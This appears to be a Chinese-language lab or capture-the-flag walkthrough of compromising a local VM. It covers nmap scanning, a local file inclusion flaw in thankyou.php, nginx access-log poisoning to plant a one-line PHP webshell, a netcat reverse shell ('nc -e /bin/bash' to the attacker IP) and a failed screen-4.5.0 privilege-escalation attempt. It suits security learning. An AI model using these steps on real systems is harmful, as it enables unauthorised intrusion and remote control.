0x00

1
2
3
4
nmap -Pn 192.168.114.0/24

nmap -A -T 4 192.168.114.146

image-20200514054055039

特地查了一下rpcbind,大概是将RPC服务映射到其侦听的端口的服务,和DNS类似。

rpcbind [3]实用程序将RPC服务映射到其侦听的端口。RPC进程在启动时会通知rpcbind,注册正在侦听的端口以及期望使用的RPC程序号。然后,客户端系统使用特定的RPC程序服务器与服务器上的rpcbind联系。rpcbind服务重新设置客户端重定向到正确的端口号,刹车它可以与请求的服务进行通信

80端口也是打开的,先试试从80端口入手

image-20200514054437764

wappalyzer只检测出它是php编写的,以及服务器是nginx。

访问contact的时候,发现有一个留言功能,或许可以试试xss

image-20200514054556665

burp跑了字典,不行

试试跑目录,什么都没跑出来

sql注入,试了几个原始头参数,没用

实在没办法了,还是乖乖的去看大佬文章学知识吧

作者提到,当我们提交contact表单时,下边的logo会从2019变成2020

未提交前:

image-20200514064408110

提交后:

image-20200514064453517

测试了很久发现是LFI漏洞

其实首页就已经提示了是本地文件包含漏洞

image-20200514064800357

用/etc/passwd测试,存在LFI漏洞

按理来说,像数据库日志文件,登陆日志文件,访问日志文件,linux的话,都在/var下,那就直接去看看access文件

1
http://192.168.114.133/thankyou.php?file=/var/log/nginx/access.log

image-20200514065353784

学到一个新知识

image-20200514065332937

这样插入一句话木马的,我还是第一次见

提交成功

image-20200514065419432

验证一下cmd是否可以执行,给cmd一个parameter,用**&cmd=id**

image-20200514065734341

全局搜索一下uid

image-20200514065546988

请出netcat 

1
2
3
nc -e /bin/bash 192.168.114.1 1234

192.168.114.1为攻击机IP地址

image-20200514070835769

再在本地执行

1
nc -lvp 1234

奇怪的是,我在windows下怎么做都不成功

所以只好切换成kali

image-20200514071554470

然后

image-20200514071803007

不太知道这是什么,查了下

2>/dev/null

2是错误输出

/dev/null 代表 linux 的空设备文件

2>/dev/null 意思就是把错误输出到“黑洞” ,也就是空文件中

锁定目标screen-4.5.0,我的理解是个程序之类的东西,

kali自带漏洞搜索,那就查查

1
searchsploit screen

image-20200514072553731

image-20200514072616966

image-20200514072646869

接下来就是漏洞利用

image-20200514072742399

好像不太行得通

image-20200514073252130

试试另一个41154.sh

image-20200514073444042

提权未成功

再议

总结

要细心观察每一个地方的变化